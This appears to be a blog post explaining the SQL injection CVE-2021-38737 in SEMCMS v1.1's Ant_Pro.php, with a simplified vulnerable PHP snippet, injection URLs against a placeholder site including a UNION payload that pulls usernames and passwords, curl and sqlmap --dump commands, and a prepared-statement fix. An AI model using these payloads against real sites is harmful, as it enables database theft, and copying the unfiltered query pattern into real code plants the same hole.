CVE-2021-38737 - SEMCMS v1.1 SQL Injection Vulnerability Explained

In today's connected world, website vulnerabilities can pose severe risks to organizations. One such flaw, registered as CVE-2021-38737, impacts the SEMCMS v1.1 content management system. This exclusive post explains the vulnerability, how it works, and how hackers can exploit it, including real code samples and security references.

What is CVE-2021-38737?

CVE-2021-38737 refers to a security bug discovered in SEMCMS v1.1’s file called Ant_Pro.php. This bug lets an attacker manipulate your web database using something called SQL Injection.

SQL Injection (SQLi) happens when an application doesn't properly clean user input, allowing attackers to run malicious SQL commands on the database. With this bug, an attacker could steal sensitive data, alter information, or even take over the website.

Where's the Problem?

The vulnerable script is found in Ant_Pro.php in the SEMCMS v1.1 CMS. Specifically, the parameter passed by users isn’t filtered properly before being used in a SQL query.

Here’s an example code snippet that shows the risky part (from a public PoC, edited for clarity):

// Ant_Pro.php (simplified for demonstration)
$id = $_GET['id'];
$sql = "SELECT * FROM products WHERE id = '$id'";
// Database call using the $sql query
$result = mysqli_query($conn, $sql);

Notice how $id is used in the SQL query without any validation. This allows an attacker to inject SQL statements.

Let’s try a real-world example. Suppose the target URL is

http://victim.com/Ant_Pro.php?id=1

If an attacker changes the URL to this

http://victim.com/Ant_Pro.php?id=1' OR '1'='1

The SQL query now becomes

SELECT * FROM products WHERE id = '1' OR '1'='1'

Since '1'='1' is always true, the database will dump all products!

Attackers can also use UNION-based injections to pull data from other tables

http://victim.com/Ant_Pro.php?id=1' UNION SELECT username, password FROM users-- -

Tools like sqlmap can automate this process, making attacks easier and faster.

Here’s a quick sample using curl

curl "http://victim.com/Ant_Pro.php?id=1' OR '1'='1"

Or use sqlmap

sqlmap -u "http://victim.com/Ant_Pro.php?id=1" --risk=3 --level=5 --dump

Security References

- Official CVE Details - CVE-2021-38737
- Exploit Database Reference
- CVE Entry at CVE.org
- OWASP - SQL Injection Explained

- Use prepared statements or parameterized queries

// Secure way with prepared statements
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Summary

CVE-2021-38737 in SEMCMS v1.1 is a dangerous SQL Injection flaw that could let hackers steal or change your website’s data. It affects Ant_Pro.php and can be easily exploited by just changing a URL. Always update your software, sanitize your inputs, and check the references above for further reading.


Stay safe! Always keep your software up-to-date and never trust user input.

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:34:00 UTC